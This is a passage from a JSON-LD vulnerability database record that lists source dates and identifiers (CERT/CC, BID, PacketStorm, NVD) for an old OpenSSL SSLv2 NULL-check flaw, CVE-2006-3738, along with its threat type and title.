          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2006-09-28T12:12:12",
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "date": "2007-01-13T22:56:30",
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "date": "2006-10-04T01:20:54",
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "date": "2007-01-27T02:35:42",
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "date": "2006-10-04T00:46:38",
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Boundary Condition Error",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      }
    }